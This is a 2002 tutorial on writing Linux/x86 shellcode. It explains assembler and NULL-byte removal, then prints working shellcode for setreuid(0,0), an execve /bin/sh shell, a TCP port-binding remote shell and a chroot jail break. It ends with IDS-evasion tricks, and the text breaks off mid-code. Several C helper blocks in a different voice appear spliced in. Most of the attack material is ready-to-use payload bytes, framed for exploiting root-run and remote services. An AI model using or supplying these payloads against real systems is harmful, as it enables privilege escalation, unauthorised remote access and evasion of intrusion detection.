UNF && pr1 present: Writing Linux/x86 shellcodes for dum dums.
-----------------------------------------------------------------------------------------------
Copyright (c) February 2002, Sebastian Hegenbart (a.k.a pr1) and UNF (United Net Frontier)

The following material is property of UNF && pr1. Do not redistribute this article in
modified form, and give proper credit to UNF and pr1 if you redistribute it or if you
write your own article based upon the following material.
-----------------------------------------------------------------------------------------------

1. Introduction

There are quite a few good texts about writing shellcode out there. Unfortunately some of
them require a lot of assembler knowledge. In this text I'll try to introduce you to
Linux/x86 assembler as well as to writing shellcode for Linux/x86. This introduction to
ASM won't be complete though. I will only cover the parts that matter for writing
shellcode, and try to do a good job of explaining the code used. Nothing can replace a
good ASM book or a disassembler ;)

1.2. What is shellcode?

Shellcode is simply a bunch of CPU instructions. It's called shellcode because the first
shellcodes simply spawned a shell. The term is actually obsolete ;) because there are
remote shellcodes (UDP as well as TCP), chroot breaking codes, codes that append a line to
a file, setreuid codes and much more ... I'm going to call it shellcode throughout the
text because everybody does.

1.3. What do we need shellcode for?

After taking over a process (hopefully suid|sgid|daemon run by root...) we usually want it
to do something useful. There are lots of techniques like return into libc, GOT overwrite
addys, PLT infection, exploiting .dtors ... If you can't get any existing function to do
your mighty work ( overwriting func pointers, ... ) you may want to use shellcode.
Simply overwrite the saved return address (the value that ends up in %eip) with some
buffer address so that execution lands in a bunch of NOPs, and your CPU will fetch
instructions from there onwards. If you did a good job writing the exploit, your input
buffer will contain the shellcode somewhere after the NOPs. Once %eip reaches the start of
your shellcode it will be executed and you win!

1.4 How do I write shellcode?

Ok let's start the main part of this article. I assume that you have at least some C
knowledge.

=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=

2. Assembler:

Asm is a low level programming language. It's so damn low level that you're able to set
some transistors in your CPU. An IA-32 CPU works with several registers. Accessing those
registers is much faster than accessing memory directly. You tell your program what to do
by filling those registers with values. The most important registers to know are:
%eax,%ebx,%ecx,%edx,%esp,%ebp,%esi,%edi,%eip
All of these registers are 4 bytes long on a 32 bit CPU. The names might sound like there
was some uncreative developer doing his work but that's wrong:

# %eax is the accumulator register. After switching to kernel mode (int $0x80) the kernel
  checks it for the syscall number (every function provided by our kernel has its own
  syscall number). Look for these numbers in /usr/include/asm/unistd.h.
# %ebx is the base register. Our first argument to a syscall should be placed inside this
  register.
# %ecx the second argument.
# %edx the third.
# %esp is the stack pointer and points to the top of the stack (the top of the current
  stack frame).
# %ebp is the stack base pointer; it points to the bottom of the current stack frame.
# %eip is the instruction pointer (our best friend in relation with buffer overflows).
  Note that there is no instruction to load this register directly; it only changes
  through control transfers such as jmp, call and ret.
# %esi and %edi are the source index and destination index registers (use them to store
  user data in your shellcode)

2.1 Modifying registers:

There are a lot of instructions dealing with the modification of registers. You can modify
a byte, a word or the whole register. This is selected with a suffix appended to an
instruction, e.g.: movl,movb,movw (long,byte,word)

# mov ...      the mov instruction moves something into a register (an addy, some number,
               another register's content...). In AT&T syntax (the syntax I'm using
               throughout the text) the source is the first operand, the destination the
               second.
# inc,dec ...  increments or decrements the content of a register
# add,sub ...  adds/subtracts something to/from the content of a register
# xor ...      This is a bit operation (like not, or and and). Xor plays a special role
               when dealing with shellcode, so some basic explanation is due:
               1 xor 0 is 1, 0 xor 0 is 0, 1 xor 1 is 0
               thus 4 xor 4 is 0 (100 xor 100 == 000). Xoring a register with itself
               therefore always sets it to zero.
               Note: a result bit of xor is set exactly where the two operands differ.
               Counting those bits gives the Hamming distance between two code words,
               which is used in coding theory and encryption.
# leal ...     (stands for load effective address long) with this instruction you can load
               a memory address into a register
# int $0x80    that's a software interrupt. To keep it simple: it switches to kernel mode
               and lets the kernel execute our syscall.
# push,pop ... save something on the stack or load something from the stack

Note: You can access the lower or higher byte of the lower word of a register (%al,%ah),
the lower word of a register (%ax) or the whole (extended) register (%eax). There is no
way to access the higher word of a register directly. So registers can be accessed
byte-wise (%al,%bh,...), word-wise (%ax,%bx,...) and as a whole (%eax,%ebx,...).

Prepared with this knowledge we can start writing some asm code and later some shellcode.
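The xor rules and the sub-register layout described above can be tried out in plain C.
What follows is only a sketch for illustration: a uint32_t stands in for %eax, and the
helper names (hamming_distance, low_byte, high_byte, low_word, set_low_byte) are made up
for this example, they are not part of any library.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helpers for illustration only; a uint32_t stands in for %eax. */

/* Number of bit positions in which a and b differ (set bits of a xor b). */
unsigned hamming_distance(uint32_t a, uint32_t b)
{
    uint32_t diff = a ^ b;      /* a bit is set exactly where a and b differ */
    unsigned count = 0;

    while (diff != 0) {
        count += diff & 1u;     /* count the lowest bit, then shift it out */
        diff >>= 1;
    }
    return count;
}

/* %al: bits 0-7 of the register */
uint8_t low_byte(uint32_t reg)
{
    return (uint8_t)(reg & 0xffu);
}

/* %ah: bits 8-15 of the register */
uint8_t high_byte(uint32_t reg)
{
    return (uint8_t)((reg >> 8) & 0xffu);
}

/* %ax: bits 0-15 of the register */
uint16_t low_word(uint32_t reg)
{
    return (uint16_t)(reg & 0xffffu);
}

/* What "movb $value,%al" does: replace bits 0-7, leave bits 8-31 untouched. */
uint32_t set_low_byte(uint32_t reg, uint8_t value)
{
    assert((reg ^ reg) == 0);   /* xoring a value with itself always gives zero */
    return (reg & 0xffffff00u) | value;
}
```

Calling set_low_byte(0xdeadbeef, 0x46) leaves the upper three bytes alone, which is
the reason a register has to be zeroed before only its low byte is written.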
Let's start with a Hello, world ;) (there was no way avoiding it)

.data
message:
        .string "Hello, world\n"

.text
.globl main
main:
        # write(int fd,char *message,ssize_t size);
        movl $0x4,%eax          # Syscall number 4 from /usr/include/asm/unistd.h into %eax
        movl $0x1,%ebx          # The standard output file descriptor (stdout)
        movl $message,%ecx      # the addy of our message into %ecx
        movl $0xd,%edx          # the length of our message (13 bytes including the \n)
        int  $0x80              # let the kernel execute write()

        # exit(int returncode);
        movl $0x1,%eax          # Syscall number 1
        xorl %ebx,%ebx          # set %ebx to zero
        int  $0x80

Note: This piece of code wouldn't work as shellcode for two reasons:
1. It's not address independent ( due to the declaration of a .data field )
2. It contains zeros, which terminate the usual string operating functions.

Don't panic! I'll explain the whole procedure of making the shellcode now ;)

=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=

3. Writing shellcode:

3.1 Setreuid shellcode:

We will start with a small and easy piece, a setreuid(0,0) shellcode. We need a setreuid
or a seteuid shellcode if the program drops privileges before the vulnerable function
executes ( usually with a seteuid(getuid()) ). The C program would look like:

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
        setreuid(0,0);
        exit(0);
}

080483b0 <main>:
 80483b0:  b8 46 00 00 00   movl $0x46,%eax
 80483b5:  bb 00 00 00 00   movl $0x0,%ebx
 80483ba:  b9 00 00 00 00   movl $0x0,%ecx
 80483bf:  cd 80            int $0x80
 80483c1:  8d 76 00         lea 0x0(%esi),%esi
 80483c4:  90               nop
 80483c5:  90               nop
 80483c6:  90               nop
 80483c7:  90               nop
 80483c8:  90               nop
 80483c9:  90               nop
 80483ca:  90               nop
 80483cb:  90               nop
 80483cc:  90               nop
 80483cd:  90               nop
 80483ce:  90               nop
 80483cf:  90               nop

That's the whole main function generated by our compiler. But we only need the setreuid
piece:

 80483b0:  b8 46 00 00 00   movl $0x46,%eax
 80483b5:  bb 00 00 00 00   movl $0x0,%ebx
 80483ba:  b9 00 00 00 00   movl $0x0,%ecx
 80483bf:  cd 80            int $0x80

Thus the setreuid shellcode would be:

"\xb8\x46\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xb9\x00\x00\x00\x00"
"\xcd\x80"

If you go through this shellcode you will notice that there are more NULL bytes ( \x00 )
than instructions in this code. Unfortunately we can't use any shellcode containing NULL
bytes. That's because most of the time we will be exploiting C programs, and there is no
string datatype in C. There is only a (char *) pointer pointing to the first byte of the
string in memory. A NULL byte represents the end of the string. String operating functions
like strcpy and strcat stop copying after reaching the first NULL byte because they think
they have reached the end of the string. Thus only "\xb8\x46" from our setreuid shellcode
would be copied when trying to exploit a program.

What we have to do now is to rewrite our assembly code so that there are no NULL bytes
left in our shellcode. As you can see these are the NULL containing instructions:

 80483b0:  b8 46 00 00 00   movl $0x46,%eax
 80483b5:  bb 00 00 00 00   movl $0x0,%ebx
 80483ba:  b9 00 00 00 00   movl $0x0,%ecx

We have to find equivalent instructions which do not produce any NULL bytes:

 80483b0:  b8 46 00 00 00   movl $0x46,%eax

This immediate instruction encodes into [opcode|destination][4 byte immediate value].
Because our immediate value is only 0x46 and the operand type is long, the other three
bytes of the immediate are zero.
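The NULL byte problem described above can be checked mechanically before a shellcode is
ever used. The following is a minimal sketch, assuming the bytes are available as a C
array; the helper names first_nul_offset and bytes_seen_by_strcpy are hypothetical and
exist only for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* The setreuid encoding from the text above, NULL bytes included. */
const unsigned char setreuid_with_nuls[] =
    "\xb8\x46\x00\x00\x00"      /* movl $0x46,%eax */
    "\xbb\x00\x00\x00\x00"      /* movl $0x0,%ebx  */
    "\xb9\x00\x00\x00\x00"      /* movl $0x0,%ecx  */
    "\xcd\x80";                 /* int $0x80       */

/* Hypothetical helper: offset of the first 0x00 byte in code[0..len), or -1. */
long first_nul_offset(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* Hypothetical helper: how many bytes a strcpy-style function would copy. */
size_t bytes_seen_by_strcpy(const unsigned char *code)
{
    assert(code != NULL);
    return strlen((const char *)code);  /* stops at the first NULL byte */
}
```

For the array above, first_nul_offset(setreuid_with_nuls, sizeof setreuid_with_nuls - 1)
reports offset 2 and bytes_seen_by_strcpy returns 2, which matches the observation that
only "\xb8\x46" would survive a strcpy. The "- 1" skips the terminator the compiler
appends to the string literal.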
We substitute the movl $0x46,%eax instruction with:

 80483c6:  31 c0            xorl %eax,%eax
 80483c8:  b0 46            movb $0x46,%al

The xorl sets %eax to zero. This is needed because we can't be sure that %eax is empty
when we change only the lower 8 bits. If %ah (or any of the higher bits) held some value
and we didn't zero the register out in advance, the kernel would execute the wrong
syscall. The movb instruction encodes into [opcode|register][1 byte immediate value]. One
byte can encode unsigned values up to 255 (or -128 to 127 in two's complement).

Again our logically equivalent NULL free setreuid piece:

 80483b0:  31 c0            xorl %eax,%eax
 80483b2:  31 db            xorl %ebx,%ebx
 80483b4:  31 c9            xorl %ecx,%ecx
 80483b6:  b0 46            movb $0x46,%al
 80483b8:  cd 80            int $0x80

And our working shellcode:

"\x31\xc0"
"\x31\xdb"
"\x31\xc9"
"\xb0\x46"
"\xcd\x80"

Besides being NULL free a good shellcode should also be as small as possible. The smaller
the shellcode the more NOPs can be placed in the exploit buffer, thus increasing the
chances of guessing a correct return address.

3.2 Making your shellcode portable:

You will probably not know much about a remote system. Or you won't have enough privileges
to find out a lot about the remote system. Or maybe you do not even have access to the
remote system yet. These are a few reasons not to write shellcode fitting only one system.
Your shellcode should be portable. Thus no absolute addressing may be used when writing
shellcode. Chances are minimal that the data you need will be at the expected address.
Shellcode should generally be written using relative addresses.

e.g: we do not write:
        jmp 0x80483b8
instead we write a jump relative to the current position:
        jmp 0x1a

3.3 Shell spawning shellcode:

Spawning a shell in C looks like:

#include <unistd.h>

int main(void)
{
        char *name[2];

        name[0]="/bin/sh";
        name[1]=NULL;
        execve(name[0],name,NULL);
}

As you can see, we need a character string ( "/bin/sh" ) to let execve know what we want
to execute. But we have to fetch the address of "/bin/sh" somehow, in a way that lets us
refer to it relatively.
If you have some knowledge about the Intel architecture and CPU architecture in general
you know that the memory location of the next instruction to be executed is stored in
%eip, often called pc or program counter. If a program calls a sub-function, the address
of the next instruction to be executed after the sub-function's return must be stored
somewhere. On some RISC CPUs this address can be stored in a register, like:

        jal addy,reg    /* jumps to addy and stores pc+4 in reg */
        jr  reg         /* the return of our sub-function jumps to the addy stored in reg */

For our Intel CISC:

        call sub_func   /* jumps to sub_func and pushes the address of the instruction
                           following the call onto the stack */
        ret             /* after the stack was cleaned up the function jumps to the saved
                           address lying on the stack */

We can say that the address of the next instruction is pushed onto the stack by call. Thus
we can apply a little trick:

        call some_offset        /* call pushes the address right after the call
                                   instruction, which is the address of "/bin/sh",
                                   onto the stack */
        .string "/bin/sh"

Note that the string "/bin/sh" lies in the .text ( or code ) segment. Our CPU can't
execute "/bin/sh", thus we have to make sure that the CPU never actually executes this
piece of data. Let's look at a complete example of fetching an address while avoiding the
execution of "/bin/sh".

.globl main
main:
        jmp to_call
after_jmp:
        popl %esi               /* addy is now in %esi */
        /* exit */
        xorl %eax,%eax
        incl %eax
        int $0x80
to_call:
        call after_jmp
        .string "/bin/sh"

We jmp to the call, let call do its work and jump back, pop the address from the stack and
exit.
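Both the jmp and the call in this trick take displacements that are counted from the end
of the instruction itself, so it helps to be able to compute and to decode them. The
following is a small sketch under stated assumptions: offsets are counted from the first
byte of the shellcode, and the function names rel_displacement and decode_rel32 are
hypothetical, chosen only for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Displacement of a relative jmp/call:
 * target offset minus the offset of the NEXT instruction.
 */
int32_t rel_displacement(uint32_t insn_offset, uint32_t insn_length,
                         uint32_t target_offset)
{
    int64_t next = (int64_t)insn_offset + (int64_t)insn_length;

    return (int32_t)((int64_t)target_offset - next);
}

/*
 * Decode the 4 operand bytes that follow a 0xe8 (call rel32) opcode.
 * x86 stores them little endian, as a two's complement number.
 */
int32_t decode_rel32(const unsigned char *operand)
{
    uint32_t raw;

    assert(operand != NULL);
    raw = (uint32_t)operand[0]
        | ((uint32_t)operand[1] << 8)
        | ((uint32_t)operand[2] << 16)
        | ((uint32_t)operand[3] << 24);

    if (raw <= 0x7fffffffu)
        return (int32_t)raw;                    /* forward displacement */
    return -(int32_t)(0xffffffffu - raw) - 1;   /* backward displacement */
}
```

As an example, a 2 byte jmp at offset 0 that targets a call at offset 31 needs the
displacement 0x1d, and a 5 byte call at offset 31 that targets offset 2 needs -34.
Decoding the operand bytes "\xde\xff\xff\xff" gives exactly that -34 (-0x22).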
static char lnx_execve[]=

"\xeb\x1d"              // jmp 0x1d               /* jump to the call to gather the "/bin/sh" addy */
"\x5b"                  // popl %ebx              /* pop the "/bin/sh" addy */
"\x31\xc0"              // xorl %eax,%eax
"\x89\x5b\x08"          // movl %ebx,0x8(%ebx)    /* store the string address at offset 0x8 (argv[0]) */
"\x88\x43\x07"          // movb %al,0x7(%ebx)     /* NULL terminate the string */
"\x89\x43\x0c"          // movl %eax,0xc(%ebx)    /* NULL terminate the arguments (argv[1]) */
"\x8d\x4b\x08"          // leal 0x8(%ebx),%ecx    /* load %ecx with the address of the argument array */
"\x8d\x53\x0c"          // leal 0xc(%ebx),%edx    /* load %edx with the address of the NULL word */
"\xb0\x0b"              // movb $0xb,%al          /* execve syscall */
"\xcd\x80"              // int $0x80
"\x31\xc0"              // xorl %eax,%eax         /* and exit to avoid an infinite loop */
"\x21\xd8"              // andl %ebx,%eax
"\x40"                  // incl %eax
"\xcd\x80"              // int $0x80
"\xe8\xde\xff\xff\xff"  // call -0x22             /* 0xffffffde is -0x22: back to the popl */
"/bin/sh";

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

4.0 More Advanced Shellcodes:

For remote exploits we need other kinds of shellcode. We can't just spawn a shell
remotely. Thus our shellcode needs network capabilities. To bind a shell onto a port we
can write:

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

int main(void)
{
        char *exec[2];
        int fd,fd2;
        struct sockaddr_in addy;

        addy.sin_addr.s_addr = INADDR_ANY;
        addy.sin_port = htons(1337);
        addy.sin_family = AF_INET;

        exec[0]="/bin/sh";
        exec[1]="sh";

        fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        bind(fd,(struct sockaddr *)&addy,sizeof(struct sockaddr_in));
        listen(fd,1);
        fd2 = accept(fd,NULL,0);
        dup2(fd2,0);
        dup2(fd2,1);
        dup2(fd2,2);
        execl(exec[0],exec[1],(char *)NULL);
}

A quite easy task in C. Now let's try the same thing in assembler.

4.1. Socket Syscalls:

Usually the syscall number is moved into %eax and the arguments into the following
registers. After using the kernel interrupt our work is done. There are functions with
more arguments than there are registers to store them in; in that case simply store your
arguments in user memory and pass the address of this memory in a register.
Referring to socket syscalls ( socket, bind, listen, accept,...
) it's slightly different. Every socket call has the syscall number 0x66. So how does the
kernel know which call was meant? This is done via a subcode in %ebx, while %ecx points
to the arguments stored in memory. Some important subcodes are:

        socket()  1
        bind()    2
        listen()  4
        accept()  5

Check for more.

4.2. Struct Sockaddr_in:

We also have to take a look at struct sockaddr_in:

struct sockaddr_in {
        sa_family_t    sin_family;      /* 2 byte containing AF_INET (defined as 2) */
        in_port_t      sin_port;        /* 2 byte with the TCP or UDP port number in network
                                         * byte order */
        struct in_addr sin_addr;        /* 4 byte, usually contains the server's addy but we
                                         * want to bind our own addy and thus zero it out
                                         * (same as INADDR_ANY) */
        char           sin_zero[8];     /* should be zeroed out as well */
};

Note: BSD systems start this structure with an additional 1 byte sin_len field holding the
length of the structure. Linux has no sin_len; the whole structure is 0x10 bytes long for
AF_INET (ipv4) and that length is passed to bind() as addrlen.

4.3. Port binding shellcode:

static char bind[]=

/* socket(int domain, int type, int protocol); */
"\x31\xc0"              // xorl %eax,%eax
"\x89\x46\x10"          // movl %eax, 0x10(%esi)  /* 3rd Argument: protocol 0 (the default, TCP) */
"\x40"                  // incl %eax
"\x89\xc3"              // movl %eax, %ebx        /* subcode 1: socket() */
"\x89\x46\x0c"          // movl %eax, 0xc(%esi)   /* 2nd Argument SOCK_STREAM */
"\x40"                  // incl %eax
"\x89\x46\x08"          // movl %eax, 0x8(%esi)   /* 1st Argument AF_INET */
"\x8d\x4e\x08"          // leal 0x8(%esi), %ecx   /* %ecx points to the arguments */
"\xb0\x66"              // movb $0x66, %al
"\xcd\x80"              // int $0x80

/* bind(int fd, struct sockaddr_in *my_addy, socklen_t addrlen); */
"\x43"                  // incl %ebx              /* subcode 2: bind() */
"\x88\x46\x04"          // movb %al,0x4(%esi)     /* save fd returned from socket */
"\x31\xc0"              // xorl %eax,%eax
"\xc6\x46\x0c\x10"      // movb $0x10,0xc(%esi)   /* sockaddr_in length */
"\x66\x89\x5e\x10"      // movw %bx,0x10(%esi)    /* AF_INET */
"\x89\x46\x14"          // movl %eax,0x14(%esi)   /* INADDR_ANY */
"\x89\xc2"              // movl %eax,%edx         /* keep a zero in %edx for later */
"\xb0\x90"              // movb $0x90,%al         /* sin_port */
"\x66\x89\x46\x12"      // movw %ax,0x12(%esi)    /* bytes 0x90 0x00: port 0x9000 (36864) */
"\x8d\x4e\x10"          // leal 0x10(%esi),%ecx   /* load structure address into %ecx */
"\x89\x4e\x08"          // movl %ecx,0x8(%esi)    /* save struct address at offset 0x8 */
"\x8d\x4e\x04"          // leal 0x4(%esi),%ecx    /* %ecx points to fd, struct and length */
"\xb0\x66"              // movb $0x66,%al
"\xcd\x80"              // int $0x80

/* listen(int fd, int backlog); */
"\x89\x5e\x08"          // movl %ebx,0x8(%esi)    /* backlog of 2 */
"\x43"                  // incl %ebx
"\x43"                  // incl %ebx              /* subcode 4: listen() */
"\xb0\x66"              // movb $0x66,%al
"\xcd\x80"              // int $0x80

/* accept(int fd, struct sockaddr_in *addy, socklen_t *addrlen); */
"\x89\x56\x08"          // movl %edx,0x8(%esi)    /* addy is a NULL pointer */
"\x89\x56\x0c"          // movl %edx,0xc(%esi)    /* so is addrlen */
"\x43"                  // incl %ebx              /* subcode 5: accept() */
"\xb0\x66"              // movb $0x66,%al
"\xcd\x80"              // int $0x80

/* dup2(int old, int new) */
"\x86\xc3"              // xchg %al,%bl           /* fd returned from accept is first arg */
"\x31\xc9"              // xorl %ecx,%ecx         /* stdin */
"\xb0\x3f"              // movb $0x3f,%al
"\xcd\x80"              // int $0x80
"\x41"                  // incl %ecx              /* stdout */
"\xb0\x3f"              // movb $0x3f,%al
"\xcd\x80"              // int $0x80
"\x41"                  // incl %ecx              /* stderr */
"\xb0\x3f"              // movb $0x3f,%al
"\xcd\x80"              // int $0x80

/* execve(const char *filename, char *const argv[], char *const envp[]); */
"\xeb\x1d"              // jmp 0x1d               /* jump to the call to gather the "/bin/sh" addy */
"\x5b"                  // popl %ebx              /* pop the "/bin/sh" addy */
"\x31\xc0"              // xorl %eax,%eax
"\x89\x5b\x08"          // movl %ebx,0x8(%ebx)    /* store the string address at offset 0x8 (argv[0]) */
"\x88\x43\x07"          // movb %al,0x7(%ebx)     /* NULL terminate the string */
"\x89\x43\x0c"          // movl %eax,0xc(%ebx)    /* NULL terminate the arguments (argv[1]) */
"\x8d\x4b\x08"          // leal 0x8(%ebx),%ecx    /* load %ecx with the address of the argument array */
"\x8d\x53\x0c"          // leal 0xc(%ebx),%edx    /* load %edx with the address of the NULL word */
"\xb0\x0b"              // movb $0xb,%al          /* execve syscall */
"\xcd\x80"              // int $0x80
"\x31\xc0"              // xorl %eax,%eax
"\x21\xd8"              // andl %ebx,%eax
"\x40"                  // incl %eax
"\xcd\x80"              // int $0x80
"\xe8\xde\xff\xff\xff"  // call -0x22             /* 0xffffffde is -0x22: back to the popl */
"/bin/sh";

Note: This shellcode is quite bloated. It could be optimized further, especially the
execve part ( that's our original execve code ). I didn't optimize it further for better
readability. Its only purpose is to show the principles of writing portbind shellcode.

=-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-=

5.
Chroot breaking shellcode:

Note: On linux the chroot behaviour changed somewhere between kernel 2.4.6 and 2.4.13.
This method works only on kernels <= 2.4.5.

Sometimes daemons like ftpd,httpd,... run in a so called change-root jail. This simply
means that the root directory of the process is changed to some other path, for example
your home directory. Since your homedir now is / (note that this is not the real root) you
can't perform a cd .. and do mighty things with your account, and you are not able to
spawn a shell either because /home/pr1/bin/sh does not really exist ( if we consider
/home/pr1 to be chrooted ).

Unfortunately for computer security you can break this jail. This is a quite easy task:

        * create another directory
        * chroot into this directory
        * do a chroot("../../../"); with many "../"

Our chroot breaking C proggy:

#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
        mkdir("pr1",0755);
        chroot("pr1");
        chroot("../../../../../../../../../../");
}

Note: We create a directory called "sh" in assembler. That way we can reuse the string we
need to execute the shell as our directory name, which reduces our shellcode's size and
simplifies the code. ;)

static char chroot[]=

"\xeb\x4e"              // jmp 0x4e

/* mkdir(); */
"\x31\xc0"              // xorl %eax,%eax
"\x5e"                  // popl %esi              /* addy of /bin/sh now in %esi */
"\x8d\x5e\x05"          // leal 0x5(%esi),%ebx    /* load addy of sh into %ebx */
"\x66\xb9\xed\x01"      // movw $0x1ed,%cx        /* that's the 0755 mode flag */
"\xb0\x27"              // movb $0x27,%al         /* mkdir syscall */
"\xcd\x80"              // int $0x80

/* chroot(); */
"\x31\xc0"              // xorl %eax,%eax
"\xb0\x3d"              // movb $0x3d,%al         /* chroot syscall, sh still in %ebx */
"\xcd\x80"              // int $0x80

/* chroot("../"); */
"\x31\xc0"              // xorl %eax,%eax
"\xbb\xd2\xd1\xd0\xff"  // movl $0xffd0d1d2,%ebx
"\xf7\xdb"              // negl %ebx
/* We put "../" into %ebx.
 * "../" encodes into "\x2e\x2e\x2f". Intel is little endian, so the register has to hold
 * 0x002f2e2e for these bytes to end up in memory in the right order. That value contains
 * a NULL byte, thus we put its two's complement 0xffd0d1d2 into %ebx and negate it with
 * negl. This results in our wished 0x002f2e2e, i.e. "../" followed by a NULL byte.
 */
"\x31\xc9"              // xorl %ecx,%ecx
"\xb1\x10"              // movb $0x10,%cl         /* we loop 16 times */
"\x56"                  // pushl %esi             /* save "/bin/sh" string */
/* Set up the write pointer. We start at 0x10(%esi) */
"\x01\xce"              // addl %ecx,%esi
"\x89\x1e"              // movl %ebx,(%esi)       /* and write to the pointed addy */
"\x83\xc6\x03"          // addl $0x3,%esi         /* advance the write pointer */
"\xe0\xf9"              // loopne -0x7
"\x5e"                  // popl %esi              /* restore "/bin/sh" string */
"\xb0\x3d"              // movb $0x3d,%al         /* chroot syscall */
"\x8d\x5e\x10"          // leal 0x10(%esi),%ebx   /* this is our evil ../../.. string */
"\xcd\x80"              // int $0x80

/* execve */
"\x31\xc0"              // xorl %eax,%eax
"\x89\x76\x08"          // movl %esi,0x8(%esi)
"\x89\x46\x0c"          // movl %eax,0xc(%esi)
"\xb0\x0b"              // movb $0xb,%al
"\x89\xf3"              // movl %esi,%ebx
"\x8d\x4e\x08"          // leal 0x8(%esi),%ecx
"\x8d\x56\x0c"          // leal 0xc(%esi),%edx
"\xcd\x80"              // int $0x80

/* exit */
"\x31\xc0"              // xorl %eax,%eax
"\x21\xd8"              // andl %ebx,%eax
"\x40"                  // incl %eax
"\xcd\x80"              // int $0x80
"\xe8\xad\xff\xff\xff"  // call -0x53             /* 0xffffffad is -0x53: back to the xorl */
"/bin/sh";

Note: This negation ("not") trick is from TaeHo's chroot shellcode.

=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-=

6. IDS-evasive Codes:

Simple Intrusion Detection Systems try to identify an exploit attempt by counting the
number of NOP or NOP-like instructions in received packets. ( if you do not know what a
NOP is: it's an instruction that does nothing at all. It is used in exploits to maximize
the chances of guessing a correct buffer address. If you hit a nop the CPU will proceed
until it reaches your mighty shellcode. )

This technique can be fooled however. One of the first ideas to fool it was to use a 1
byte jump:
\x90 ( nop ) is substituted with "\xeb\x01" ( jmp 0x1 )

Another way is to use other nop-like instructions like incl %eax,incl %ebx,incl %ecx,
incl %edx, coded as: \x40,\x43,\x41,\x42
You can of course mix them up as well.
Another nice way would be something like:
        movl $0x41414141,%eax   coded as: \xb8\x41\x41\x41\x41
Let's say you hit a \x41 -> the cpu will increment %ecx until it reaches the \xb8; from
there on %eax will be loaded with 0x41414141.
You could mix this instruction with a
        movl $0x43434343,%ebx   coded as: \xbb\x43\x43\x43\x43
this would have the same result.

6.1. Hiding the "/bin/sh" string:

Another way of identifying an exploit attempt might be searching for a string like
"/bin/sh". Hiding the string is also applicable for, let's say, an imapd exploit, or
generally for a program that converts all lowercase characters into uppercase:

#include
main(int argc,char *argv[])
{
        char buf[512];
        int i;
        for(i=0;i